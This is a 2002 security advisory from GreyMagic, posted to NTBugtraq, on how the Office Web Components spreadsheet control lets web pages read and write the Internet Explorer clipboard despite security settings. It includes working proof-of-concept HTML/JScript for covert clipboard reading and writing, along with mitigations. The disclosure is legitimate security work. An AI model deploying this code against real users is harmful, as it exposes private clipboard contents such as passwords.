Controlling the clipboard with OWC in IE (GM#007-IE)

From: GreyMagic Software (security@GREYMAGIC.COM)
Date: 04/08/02


Date:         Mon, 8 Apr 2002 17:21:16 +0200
From: GreyMagic Software <security@GREYMAGIC.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

GreyMagic Security Advisory GM#007-IE
=====================================

By GreyMagic Software, Israel.
08 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm007-ie/.

Topic: Controlling the clipboard with OWC in IE.

Discovery date: 24 Feb 2002.

Affected applications:
======================

* Office 2000 - Office Web Components 9, Spreadsheet component.
* Office XP - Office Web Components 10, Spreadsheet component.

Introduction:
=============

Office Web Components (OWC) is a group of safe for scripting components used
to enrich HTML documents with Spreadsheets, Charts, Pivot tables and more.

OWC ships with the Microsoft Office package, but it is also downloadable as
a separate (free for viewing only) component.

Discussion:
===========

It is well documented that IE lets anybody read and write clipboard data by
default, until now it was possible to disable this feature by setting "Allow
paste operations via script" to "Disable".

It is now possible to gain control over the clipboard even when it is
disabled in the security zone, via the Spreadsheet component in both OWC9
and OWC10.

The "Paste" method of the Range object and the "Copy" method of the Cell
object both give an attacker full control over clipboard operations.

The attacker can continuously monitor the victim's clipboard and log the
findings to a server for later inspection. It is also possible for an
attacker to place data inside the clipboard.

Exploit:
========

Reading the contents of the clipboard:

<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
    // Paste to spreadsheet
    oSP.ActiveSheet.UsedRange.Paste();

    // Read the spreadsheet
    var oRng=oSP.ActiveSheet.UsedRange,
        iRows=oRng.Rows.Count,
        iCols=oRng.Columns.Count,
        sRes="";

    for (var iCRow=1;iCRow<=iRows;iCRow++) {
        for (var iCCol=1;iCCol<=iCols;iCCol++) {
            sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
        }
        sRes+="\n";
    }

    // Display result
    alert(sRes);
}
</script>

Assigning the clipboard's content:

<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
    oSP.Cells(1,1).Value="Trustworthy computing";
    oSP.Cells(1,1).Copy();
}
</script>

The class id of the <object> element above is for the spreadsheet component
of OWC9 (Microsoft Office 2000), OWC10's class id is
"0002E551-0000-0000-C000-000000000046", no further changes in code are
needed.

An attacker can actually use the fallback feature of the <object> element to
include either one of these components:

<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
style="display:none">
    <!-- Failed, try to include OWC9 -->
    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
style="display:none">
        <!-- None found -->
        Failed to load any of the spreadsheet components.
    </object>
</object>

Solution:
=========

Set "Run ActiveX controls and plug-ins" to "Disable" or simply
remove/disable OWC until a patch becomes available.

Microsoft has been informed, they have opened an investigation regarding
this issue.

Tested on:
==========

IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + OWC10, all patches.
IE6 Win2000 + Office 2000 (OWC9), all patches.
IE6 WinXP + Office XP (OWC10), all patches.

Demonstration:
==============

Fully dynamic proof-of-concept (clipboard monitor and clipboard writer)
demonstrations of this issue are available at
http://security.greymagic.com/adv/gm007-ie/.

Feedback:
=========

Please mail any questions or comments to security@greymagic.com.

- Copyright 2002 GreyMagic Software.



Relevant Pages

  • Controlling the clipboard with OWC in IE (GM#007-IE)
    ... Controlling the clipboard with OWC in IE. ... It is now possible to gain control over the clipboard even when it is ... The attacker can continuously monitor the victim's clipboard and log the ...
    (Bugtraq)
  • Re: "Play All" brings up "Move Files" dialogue
    ... still finding my way round xp, but on my version the send-to command copies ... is there a registry modification to enable Send to Clipboard ... Control Copies a file ... Send To Powertoys ...
    (microsoft.public.windowsxp.help_and_support)
  • Re: Why is it no longer possible to paste PP shapes as MS Drawing
    ... matter of what/how the destination program is able to receive the ... The clipboard itself is provided by the OS. ... What goes on it is totally under the control of the sending application, which can choose what, and how many, formats it wants to send. ...
    (microsoft.public.word.drawing.graphics)
  • Re: Cut, Copy, and Paste controls
    ... Since you don't actually care WHAT is in the clipboard until the menu needs to be shown, ... You don't need a timer. ... Note that this depends upon the fact that I have created a control variable for the CEdit ... Extending to other controls such as Rich Edit and a Combo Box with an edit control is left ...
    (microsoft.public.vc.mfc)
  • RE: Using VB.Net or C#, utilizing the clipboard object, how to copy an
    ... > control, a label and a single command button. ... > Let's say that after the Excel chart is on the clipboard, ... blah blah error. ... > under .Net or this is still only possible via the WIN API. ...
    (microsoft.public.dotnet.framework)